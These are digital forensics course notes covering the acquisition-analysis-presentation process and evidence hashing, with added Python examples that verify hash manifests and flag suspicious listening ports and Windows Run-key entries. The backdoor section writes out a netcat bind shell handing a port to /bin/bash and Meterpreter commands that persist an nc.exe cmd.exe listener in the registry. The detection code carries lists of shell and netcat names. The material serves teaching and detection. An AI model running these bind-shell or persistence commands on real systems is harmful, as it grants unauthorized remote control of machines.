Notes from CPNT-250 course at SAIT.

The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation and presentation of digital evidence for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operation… - (2001) Digital Forensic Research Workshop (DFRWS)

Digital archaeology is about the direct effects from user activity, such as file contents, file access time stamps, information from deleted files, and network flow logs. … Digital geology is about autonomous processes that users have no direct control over, such as the allocation and recycling of disk blocks, file ID numbers, memory pages or process ID number… - Digital Forensics with Open Source Tools

Traces left behind by an event are known as 'artifacts'.

The digital forensics process:

Acquisition -> Analysis -> Presentation

Acquisition

Collection of the digital media to be examined.

Analysis

Presentation

Process which shares results of the analysis phase with interested parties.

Steps

  1. Preserve volatile data.
  2. Inspect network activity.
  3. Collect clipboard data.
  4. Collect process information.
  5. Identify users.
  6. Map processes to their executables.
  7. Correlate open ports with processes.
  8. Collect system details.
  9. Identify services and drivers.
  10. Determine scheduled tasks.
  11. Collect non-volatile data from the live system.
  12. Forensically duplicate and preserve the media.

Elements of a good process

Evidence

Hashing

Example:

$ md5sum favicon.ico 
4a7edeeac75a39d6d0a7a3bf7f73e22f  favicon.ico
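The md5sum line above records a single hash at a single moment. What an examiner actually needs is that record written down at acquisition time and re-checked later, so that any change to the evidence (or its disappearance) is detected. The following Python is an added example for these notes, not course material: it hashes a file with MD5 and SHA-256 in one pass (MD5 still matches older records, but it is collision-weak, so SHA-256 is recorded alongside it), writes a manifest in the `hash  path` layout md5sum/sha256sum use, and verifies it. The helper names and the sample file contents are constructed for the example.

```python
import hashlib
import io
import os
import tempfile

# Added example; helper names are chosen for this illustration and are not from the course.
ALGORITHMS = ("md5", "sha256")


def digest_stream(stream, algorithms=ALGORITHMS, chunk_size=1 << 20):
    """Hash a binary stream with several algorithms in one pass, reading it in chunks
    so that a multi-gigabyte disk image never has to fit in memory."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data, algorithms=ALGORITHMS):
    return digest_stream(io.BytesIO(data), algorithms)


def hash_file(path, algorithms=ALGORITHMS):
    with open(path, "rb") as f:
        return digest_stream(f, algorithms)


def write_manifest(paths, manifest_path):
    """Record acquisition-time hashes, one line per algorithm: 'algo hex  path'."""
    with open(manifest_path, "w") as out:
        for path in paths:
            digests = hash_file(path)
            for name in ALGORITHMS:
                out.write(f"{name} {digests[name]}  {path}\n")


def verify_manifest(manifest_path):
    """Re-hash every listed file and report OK, MISMATCH or MISSING per path."""
    results = {}
    with open(manifest_path) as m:
        for line in m:
            name, expected, path = line.rstrip("\n").split(None, 2)
            if not os.path.exists(path):
                results[path] = "MISSING"
                continue
            actual = hash_file(path, (name,))[name]
            status = "OK" if actual == expected else "MISMATCH"
            # Any algorithm disagreeing marks the file; OK only if every line agreed.
            if results.get(path) != "MISMATCH":
                results[path] = status
    return results


def demo():
    """Constructed walk-through: hash a sample file, then detect modification and loss."""
    with tempfile.TemporaryDirectory() as workdir:
        evidence = os.path.join(workdir, "favicon.ico")
        with open(evidence, "wb") as f:
            f.write(b"constructed sample evidence bytes, not a real icon\n")
        manifest = os.path.join(workdir, "MANIFEST")
        write_manifest([evidence], manifest)
        before = verify_manifest(manifest)[evidence]
        with open(evidence, "ab") as f:  # simulate post-acquisition tampering
            f.write(b"\x00")
        after = verify_manifest(manifest)[evidence]
        os.remove(evidence)  # simulate the evidence file going missing
        gone = verify_manifest(manifest)[evidence]
    return before, after, gone


if __name__ == "__main__":
    print(demo())
```

Run it as a script to see the three verification states; in practice the manifest is kept separately from the evidence (and itself hashed or signed) so that an alteration cannot simply rewrite both.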

Backdoors

A backdoor is a hidden process that runs on the target machine and allows a normally unauthorized user to control the computer. It lets you return to the target machine at any time.

One of the first tasks to complete upon gaining access to a system is to migrate your shell to a more permanent home.

Netcat

Netcat can be used to function as either a client or server. As a client, it can be used to make a network connection to another service. As a server, it acts as a listener and waits to accept incoming connections.

Start server:

$ nc -l -p 3335 -e /bin/bash

Connect as client:

$ telnet localhost 3335
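From the examiner's side, the listener started above is exactly what steps 6 and 7 of the process (map processes to executables, correlate open ports with processes) are meant to surface: a socket in LISTEN state owned by a process whose command line hands the connection to a shell. The Python below is an added example for these notes, not course material. It parses text laid out like `ss -tlnp` output, joins each listener to a table standing in for what `/proc/<pid>/exe` and `/proc/<pid>/cmdline` would give on the live host, and reports the listeners worth a closer look. Both inputs are constructed for the example, and the review rules are starting-point heuristics, not a complete detection.

```python
import re
from collections import namedtuple

# Added example. SS_OUTPUT is constructed in the layout of `ss -tlnp`; PROC_TABLE is a constructed
# stand-in for /proc/<pid>/exe and /proc/<pid>/cmdline on the live host (neither is from a real system).
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     127.0.0.1:631       0.0.0.0:*          users:(("cupsd",pid=901,fd=7))
LISTEN  0       1       0.0.0.0:3335        0.0.0.0:*          users:(("nc",pid=4242,fd=3))
LISTEN  0       128     [::]:22             [::]:*             users:(("sshd",pid=812,fd=4))
"""

PROC_TABLE = {
    812: {"exe": "/usr/sbin/sshd", "cmdline": ["/usr/sbin/sshd", "-D"]},
    901: {"exe": "/usr/sbin/cupsd", "cmdline": ["/usr/sbin/cupsd", "-l"]},
    # Binary removed after launch: the process keeps running and the exe link reports "(deleted)".
    4242: {"exe": "/tmp/nc (deleted)", "cmdline": ["nc", "-l", "-p", "3335", "-e", "/bin/bash"]},
}

Listener = namedtuple("Listener", "addr port name pid exe cmdline")
PROCESS_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)')
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "sh", "bash", "cmd.exe"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_ss(text):
    """Turn `ss -tlnp` style lines into Listener records, one per (socket, process) pair."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)  # handles both 0.0.0.0:22 and [::]:22
        for m in PROCESS_RE.finditer(fields[5]):
            listeners.append(Listener(addr, int(port), m["name"], int(m["pid"]), None, []))
    return listeners


def correlate(listeners, proc_table):
    """Step 6: attach each listener's executable path and command line from the process table."""
    out = []
    for lst in listeners:
        info = proc_table.get(lst.pid, {})
        out.append(lst._replace(exe=info.get("exe"), cmdline=info.get("cmdline", [])))
    return out


def review(listener):
    """Reasons a listener deserves a closer look; an empty list means nothing stood out."""
    reasons = []
    if listener.exe is None:
        reasons.append("no process record for pid %d" % listener.pid)
    else:
        if listener.exe.endswith("(deleted)"):
            reasons.append("executable unlinked from disk: %s" % listener.exe)
        if listener.exe.startswith(WRITABLE_DIRS):
            reasons.append("executable lives in a world-writable directory: %s" % listener.exe)
    # A shell named as an argument (not as the program itself) is the -e pattern shown above.
    for arg in listener.cmdline[1:]:
        if arg in SHELLS:
            reasons.append("command line hands the socket to a shell: %s" % arg)
            break
    return reasons


def find_suspicious(ss_text, proc_table):
    """Step 7 end to end: every listening port joined to its process, keeping those with findings."""
    findings = {}
    for lst in correlate(parse_ss(ss_text), proc_table):
        reasons = review(lst)
        if reasons:
            findings[lst.port] = reasons
    return findings


if __name__ == "__main__":
    for port, reasons in find_suspicious(SS_OUTPUT, PROC_TABLE).items():
        print(port, reasons)
```

On a live host the table would be filled by reading `/proc/<pid>/exe` and `/proc/<pid>/cmdline` for each pid that `ss` reports, which is also why volatile data is preserved before anything else: once the process exits, the "(deleted)" executable and its command line are gone.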

On Unix-based systems you can add a cron job that restarts the backdoor so it persists.

On Windows systems you can modify the registry to start the backdoor (the commands below use the Meterpreter reg command syntax).

> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 3333 -e cmd.exe'
> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
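The Run key written above is one of the first places live response looks (it sits alongside services, drivers and scheduled tasks in the steps listed earlier). The Python below is an added example for these notes, not course material: it parses text laid out like the output of the built-in Windows `reg query` command for the Run key and triages each value with a few starting-point rules: a netcat binary as the program, a command interpreter passed as an argument to another program (the `-e cmd.exe` pattern above), or a program that does not live under the Windows or Program Files trees. The sample output is constructed for the example; the `nc` entry reuses the command from these notes.

```python
import ntpath
import re

# Added example. Constructed stand-in for `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
# output; the hosts, value names and data (other than the nc line from the notes) are made up.
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 3333 -e cmd.exe
    Updater    REG_SZ    C:\Users\Public\update.exe
"""

# reg query indents each value by four spaces and separates name, type and data by runs of spaces.
ENTRY_RE = re.compile(r"^ {4}(?P<name>.+?) {2,}(?P<type>REG_[A-Z_]+) {2,}(?P<data>.*)$")
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NETCAT_NAMES = {"nc.exe", "ncat.exe", "netcat.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files", "%windir%\\", "%systemroot%\\", "%programfiles")


def parse_reg_query(text):
    """Return {value_name: (type, data)} from reg query style output."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line.rstrip())
        if m:
            entries[m["name"]] = (m["type"], m["data"])
    return entries


def split_command(data):
    """Separate the program path from its arguments, honouring a double-quoted path."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end], data[end + 1:].split()
    parts = data.split()
    return (parts[0], parts[1:]) if parts else ("", [])


def review_entry(data):
    """Reasons a Run value deserves a closer look; an empty list means nothing stood out."""
    program, args = split_command(data)
    reasons = []
    if ntpath.basename(program).lower() in NETCAT_NAMES:
        reasons.append("program is a netcat binary: %s" % program)
    if not program.lower().startswith(TRUSTED_PREFIXES):
        reasons.append("program is not under Windows or Program Files: %s" % program)
    for arg in args:
        if ntpath.basename(arg).lower() in INTERPRETERS:
            reasons.append("argument launches a command interpreter: %s" % arg)
            break
    return reasons


def find_suspicious_run_entries(text):
    """Map each flagged value name to its reasons, dropping entries with no findings."""
    findings = {}
    for name, (_, data) in parse_reg_query(text).items():
        reasons = review_entry(data)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in find_suspicious_run_entries(REG_QUERY_OUTPUT).items():
        print(name, reasons)
```

The same parser works on the HKCU Run and RunOnce keys, which are the other common autostart locations; the rules are deliberately coarse and are meant to shortlist entries for a human, not to decide on their own.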